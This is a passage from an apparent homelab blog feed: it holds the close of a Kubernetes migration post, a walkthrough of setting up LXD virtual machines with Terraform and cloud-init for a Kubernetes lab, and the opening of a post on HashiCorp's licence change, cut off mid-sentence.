have opinions on everything, so I can make choices for myself.
But in HashiCorp&rsquo;s Nomad, I can also do that. I even have greater choice, because
I can decide per workload which container engine I want to use, and which
networking plugin I want to use.</p>
<p>On the bright side, at least for now I have not seen anything I would consider
a show stopper for my migration to Kubernetes. As this article was a bit longer
in the making, I&rsquo;ve just finished setting up Traefik as ingress a couple of days
ago, and I&rsquo;m working on setting up a Ceph Rook cluster now. Let&rsquo;s see how this
continues. :slight_smile:</p>
<p>Last but not least a comment mostly to myself: Write setup articles more closely
to the actual setup happening. I&rsquo;m writing a lot of this over a month after I
issued the (currently &#x1f607;) final <code>kubeadm init</code>. I&rsquo;d made some notes on
important things, but I had not thought of copying the outputs from the
<code>kubeadm init</code> or <code>kubeadm join</code> commands to show how they&rsquo;re supposed to look
like. I also did not think of making a couple of notes on the initial output of
some <code>kubectl get</code> commands during the setup phase to show what to expect,
which I think might have been nice.</p>
<p>The next article in the series will be about day 1 operations, writing about how
I plan to handle Kubernetes manifests for actual workloads in my setup.</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Putting the &#39;lab&#39; back in &#39;Homelab&#39;</title>
      <link>https://blog.mei-home.net/posts/kubernetes-lab-setup/</link>
      <pubDate>Sun, 27 Aug 2023 16:50:42 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-lab-setup/</guid>
      <description>How I set up my lab environment for my Kubernetes experiment</description>
      <content:encoded><![CDATA[<p>So, as I mentioned in my <a href="https://blog.mei-home.net/posts/hashipocalypse/">last article</a>,
I want to give Kubernetes another try after HashiCorp&rsquo;s recent license change.</p>
<p>This also gives me a chance to put the <em>lab</em> back in Home<em>lab</em>, as it has mostly
been a Home<em>prod</em> environment - not much experimentation going on there, just
slow, intentional incremental changes here and there. But my Homeprod env is not
really suited for housing a Kubernetes cluster. It mostly consists of Raspberry
Pis. Don&rsquo;t get me wrong, it is serving me well - but running two parallel clusters
with two different orchestrators on the same HW is probably not a good idea. &#x1f609;</p>
<p>So I decided to dig out my old Homeserver from the days when my Homelab was only
a single machine. It is an x86 machine, with an Intel i7 10th gen CPU, 2 500GB
SSDs and 64 GB of RAM that&rsquo;s been gathering dust in storage since I decommissioned
it sometime in the spring this year. It still had all the innards from when I
decommissioned it, and after a quick once-over to make sure I hadn&rsquo;t unplugged
any important cables, I was able to boot it right up.</p>
<p>The first thing to go was the old Arch Linux install, as it&rsquo;s wholly unsuitable
to what I needed to be doing.
Instead, the machine got an Ubuntu install. Which was the first hurdle. Not the
actual install, but rather the setup of the damn stick for it. Because I didn&rsquo;t
want to connect a monitor and keyboard, I wanted to do a headless install.</p>
<p>And the Ubuntu installer even sets up an SSH server. But the password to log in
is randomized and - you guessed it - only shown on-screen after bootup.
Which I find an interesting decision. Of course, that&rsquo;s done for security
reasons - having default installer passwords is frowned upon these days.</p>
<p>Next, I thought I could just unpack the ISO, set a password for the <code>installer</code>
user and repackage it. I even found a couple of guides to do so, but I was not
able to properly repackage the changed ISO to be bootable. So I finally gave up
and just connected a monitor and keyboard.</p>
<h2 id="baremetal-host-setup">Baremetal host setup</h2>
<p>For the actual cluster machines, I went with LXD. For the simple reason that I
used it before I moved to a fleet of baremetal Raspberry Pis and had some good
experience with it.</p>
<p>For storage, a local 70GB disk serves as the root disk. The remaining 400 GB of
that SSD became an LVM volume group to serve as an LXD storage pool:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create LXD storage volume group</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">storage</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">community.general.lvg</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">vg</span>: <span style="color:#ae81ff">vg-lxd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">pvs</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/dev/sdb3</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span></code></pre></div><p>One more important change needed for the VM host is the creation of a bridge
interface so that the VMs can communicate to the host and to my wider network.
A Linux bridge interface is rather similar to a software network switch.
I set it up with Ubuntu&rsquo;s netplan file. One very important point: You need to
disable DHCP on your main interface if it is part of the bridge, and instead
enable DHCP for the bridge interface. Otherwise, if you disable it for the
bridge but leave it enabled for the physical interface, you get DHCP DISCOVER
requests, but it won&rsquo;t actually answer to the DHCP OFFER send from your
networking infrastructure. It says so, plain and clear, in the <a href="https://netplan.readthedocs.io/en/stable/examples/#how-to-configure-network-bridges">netplan docs</a>
(why exactly does a Google search for &ldquo;netplan bridge&rdquo; not contain the netplan
docs on the very first page?!). So guess who had to pick the server up from its
corner and connect a keyboard and mouse again because he thought he is smarter
than the docs? :unamused_face:</p>
<h2 id="the-vm-os">The VM OS</h2>
<p>All of the setup finally done, the next decision was on which OS to use for the
VMs. At first, I was a bit fascinated with <a href="https://www.talos.dev/">Talos Linux</a>,
which bills itself as a Linux for Kubernetes. It follows the new &ldquo;immutable distro&rdquo;
paradigm, and I had not yet dipped my toes into that particular topic - so time
to make this a double experiment? Alas, no. It looks like
Talos isn&rsquo;t just a distro which is &ldquo;good for Kubernetes&rdquo;, but also believes it
knows better than I do. Namely, it disables SSH access. Completely. You don&rsquo;t
really need shell access, you know? In fact, it&rsquo;s bad for you.</p>
<p>Let&rsquo;s clean up one myth right away: This is certainly not for security reasons.
Because they still have an API with which you can supposedly do everything. So
we have replaced a decades old project, OpenSSH, which had audits up the wazoo,
with a hip new API. Yeah. Sure. I definitely trust your API way more than OpenSSH&hellip;</p>
<p>Another argument I heard and found more believable than security is saving Ops
teams from themselves, by way of removing the temptation of SSH&rsquo;ing into a machine
to fix a problem, instead of say going through the GitOps process, including code
reviews and everything, to fix a problem. That one I buy a lot more readily.
Although I will say: I&rsquo;ve been working in ops for a while now, and I have been
very happy to have access to the actual machines for debugging purposes. Because
sometimes, you just need to attach strace to random processes.</p>
<p>Apart from that particular piece of opinionated design, it also has an admittedly
bigger problem when it comes to my goal of experimenting with Kubernetes: It
provides its own ability to set up a Kubernetes cluster, and automates a bit
too much, at least for my initial, experimental cluster. So I&rsquo;ve put it off for
now, and might set up another experiment once I&rsquo;ve become a bit more familiar
with Kubernetes.</p>
<p>On the positive side, it has support for Raspberry Pis, so at least that&rsquo;s
not a blocker.</p>
<p>I ended up going with what I already knew: Ubuntu, which I also run on all the
other machines in my Homelab.</p>
<h2 id="lxd-setup">LXD setup</h2>
<p>To setup the VMs, I decided to go with Terraform, because it allows me to store
the setup in config files, instead of having a playbook with a series of LXD
commands. I am using the <a href="https://registry.terraform.io/providers/terraform-lxd/lxd/latest">terraform-lxd provider</a>.</p>
<p>To initialize the provider, I first had to introduce it to my Terraform main
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#a6e22e">terraform</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">required_providers</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">lxd</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;terraform-lxd/lxd&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">version</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;~&gt; 1.10.1&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">data</span> <span style="color:#e6db74">&#34;vault_generic_secret&#34;</span> <span style="color:#e6db74">&#34;lxd-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secret/lxd-pw&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;lxd&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">generate_client_certificates</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">accept_remote_certificate</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">lxd_remote</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">scheme</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">address</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-fqdn-here&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">default</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">password</span> <span style="color:#f92672">=</span> data.<span style="color:#a6e22e">vault_generic_secret</span>.<span style="color:#a6e22e">lxd</span><span style="color:#f92672">-</span><span style="color:#a6e22e">pw</span>[<span style="color:#e6db74">&#34;pw&#34;</span>]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>To get at the password, I&rsquo;m using my Vault instance again, where I pushed the
secret with <code>vault kv put secret/lxd-pw pw=-</code>. This is a bit of an anti-pattern,
as it ends up storing the password in the Terraform state. But I&rsquo;ve come to
accept that sometimes, this happens. My state is pretty well secured. But keep
this in mind when following along - your Terraform state should be kept secure!</p>
<p>Next step is configuring the LVM based LXD storage pool I mentioned above. This
is also done in Terraform:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_storage_pool&#34;</span> <span style="color:#e6db74">&#34;lvm-pool&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lvm-pool&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">driver</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lvm&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vg-lxd&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;lvm.thinpool_name&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;LXDThinPool&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;lvm.vg_name&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vg-lxd&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Next a couple of profiles, one for my controller nodes, with 4 CPUs and 4 GB of
RAM, somewhat similar to the Raspberry Pi 4 4 GB which will ultimately run my
control plane. Another one for my Ceph nodes with a bit more RAM, and finally
some base profile for networking, which adds a NIC based on the bridge interface
created previously. And then another profile for VMs with a local root disk
from the LVM pool.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-base&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;base&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot.autostart&#34;</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.vendor-data&#34;</span> <span style="color:#f92672">=</span> file(<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">path</span>.module<span style="color:#e6db74">}</span><span style="color:#e6db74">/lxd/vendor-data.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;network&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nic&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">nictype</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridged&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">parent</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;your-bridge-interface-name&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-localdisk&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;localdisk&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">pool</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_storage_pool</span>.<span style="color:#a6e22e">lvm</span><span style="color:#f92672">-</span><span style="color:#a6e22e">pool</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">size</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;50GB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-controller&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.cpu&#34;</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.memory&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4GB&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_profile&#34;</span> <span style="color:#e6db74">&#34;profile-ceph&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.cpu&#34;</span> <span style="color:#f92672">=</span> <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;limits.memory&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8GB&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With all of that created, I only needed the VMs themselves. But there was one
problem: In the rest of my (baremetal) Homelab, I&rsquo;m producing disk images with
HashiCorp&rsquo;s Packer, with my Ansible user and some other bits and pieces already
baked in. But now, I needed another way to bake in the Ansible user, as the goal
here is to learn Kubernetes - not LXD image creation. I didn&rsquo;t really want yet
another yak to shave.</p>
<h2 id="vm-images">VM images</h2>
<p>As noted above, I had already decided to go for Ubuntu as my base OS for the VMs.
And the Ubuntu LXD images support <a href="https://cloudinit.readthedocs.io/en/latest/">cloud-init</a>,
and so does <a href="https://documentation.ubuntu.com/lxd/en/latest/cloud-init/">LXD</a>.</p>
<p>After some digging, I found that I could relatively easily create my Ansible
user and provide the SSH key for it. I could also adapt the sudoers files as
I needed to make it all work.</p>
<p>But there was one problem remaining: I want my Ansible user to require a password
for sudo. But I did not want to have my Ansible user&rsquo;s password in the Terraform
state, let alone just plainly written out in the Terraform config file. So what
to do?
In the end, the only thing I could come up with was to instead set a temporary
password for my Ansible user, and run a short bootstrapping playbook to change
it to the actual password. It does not feel very elegant, but keeps my user&rsquo;s
sudo password out of the Terraform state and configs.</p>
<p>This can all be achieved with cloud-init. My <code>profile-base</code> LXD profile adds
the required cloud-config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.vendor-data&#34;</span> <span style="color:#f92672">=</span> file(<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">path</span>.module<span style="color:#e6db74">}</span><span style="color:#e6db74">/lxd/vendor-data.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>LXD&rsquo;s <a href="https://documentation.ubuntu.com/lxd/en/latest/cloud-init/#vendor-data-and-user-data">cloud-init.vendor-data</a>
config option is used here. The <code>cloud-init</code> config file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">your-ansible-user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">sudo</span>: <span style="color:#ae81ff">ALL=(ALL:ALL) ALL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ssh_authorized_keys</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">from=&#34;1.2.3.4&#34; ssh-ed25519 abcdef12345 ssh-identifier</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">sudo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">python3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">chpasswd</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">expire</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">your-ansible-user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: <span style="color:#ae81ff">your-temporary-password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">text</span>
</span></span></code></pre></div><p>This first creates the <code>your-ansible-user</code> user, with an appropriate <code>SUDOERS</code>
entry. It also adds an SSH key, allowing access only from a single machine,
which in my case is a dedicated Command &amp; Control host. I also add the <code>python3</code> and <code>sudo</code>
packages, which are required by Ansible.
Finally, I set the password for <code>your-ansible-user</code> to a pretty simple value
which I had no problem with committing to git.</p>
<p>The experience with how well this worked also has me thinking about revamping
my Netbooting setup. At the moment, I&rsquo;m generating one image per host, even
though most things are the same among all hosts, and I could just have two base
images (one amd64, one arm64) and then do the necessary per-host adaptions by
running a cloud-init server in my network.</p>
<h2 id="creating-the-vms">Creating the VMs</h2>
<p>The last part of the setup is creating the VMs themselves:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Terraform" data-lang="Terraform"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;lxd_container&#34;</span> <span style="color:#e6db74">&#34;ceph-vm-1&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vm-name&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">remote</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;server-name-here&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtual-machine&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">image</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu:22.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">profiles</span> <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">base</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">localdisk</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">lxd_profile</span>.<span style="color:#a6e22e">profile</span><span style="color:#f92672">-</span><span style="color:#a6e22e">ceph</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">start_container</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">device</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;cephdisk&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">type</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">properties</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">source</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/sda2&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">path</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/cephdisk&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;cloud-init.user-data&#34;</span> <span style="color:#f92672">=</span> <span style="color:#f92672">&lt;&lt;-EOT</span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      hostname: vm-name
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    </span><span style="color:#f92672">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This resource remotely contacts the LXD server and creates a new VM. Don&rsquo;t get
confused by the <code>lxd_container</code> resource type, this is simply the resource type
shared between LXD containers and VMs, where the <code>type</code> determines what&rsquo;s really
created.
In the <code>config</code> section, I&rsquo;m explicitly setting the <code>hostname</code> of the new machine
with the cloud-init user-data config option.
By default, the hostname is the same as the LXD VM name, which would be the <code>name</code>
field in Terraform. But as I sometimes have the habit of naming my VMs something
else than their actual hostname, I provided it explicitly here.</p>
<p><em>One very important point:</em> The <code>#cloud-init</code> at the top of the file is <strong>not</strong>
a comment - it is part of the cloud init spec. It has to be there. Took me a
while to realize that&hellip;</p>
<p>The above example is one of the two VMs which will end up serving as Ceph Rook
hosts, so it also gets handed another disk for later use by Ceph.</p>
<p>And that&rsquo;s it. After a final <code>terraform apply</code>, I&rsquo;ve finally got a Home<em>lab</em> again.</p>
<p>Over the last week, I have been researching Kubernetes and cluster setups. I&rsquo;ve
got a couple of notes on the topic and will likely write another blog post with
all the prep work rather soon. If I&rsquo;m really lucky I might finally be ready
to issue the <code>kubeadm init</code> command later today. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>HashiPocalypse?</title>
      <link>https://blog.mei-home.net/posts/hashipocalypse/</link>
      <pubDate>Thu, 17 Aug 2023 20:49:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/hashipocalypse/</guid>
      <description>Possibly.</description>
      <content:encoded><![CDATA[<p>Basically my entire Homelab is build upon HashiCorp&rsquo;s products. On August 10th,
HashiCorp <a href="https://www.hashicorp.com/blog/hashicorp-adopts-business-source-license">announced</a>
that they would switch all of their products to the <a href="https://www.hashicorp.com/bsl">BSL</a>,
the <em>Business Source License</em>, where they had been licensed under the Mozilla
Public License before.</p>
<p>From my (rather rudimentary!) understanding, the license basically says that all
&ldquo;non-production&rdquo; use is perfectly fine. I&rsquo;m pretty confident that that covers
all of my own personal usage. But as it was pointed out to me today, that
formulation also creates a lot of uncertainty for commercial entities of all
kinds.</p>
<p>For some products, it looks pretty clear on first sight. When you offer hosted
Nomad, perhaps offering Vault for secrets and Consul for service discovery and
mesh networking as well, you can&rsquo;t use the products anymore, period.</p>
<p>If, on the other hand, you are using a Nomad cluster to run your SaaS offering,
it seems that you are fine (as long as the software you are aSS&rsquo;ing isn&rsquo;t another
HashiCorp product. &#x1f609;).</p>
<p>But there are other use cases for other products that look to me to be far less
clear cut, for example what about offering Vagrant based VMs to your customers
for training on your own software?</p>
<p>Even more problematic seems to be the &ldquo;production use allowed as long as the
product doesn&rsquo;t compete with a HashiCorp offering&rdquo; clause. As far as I know,
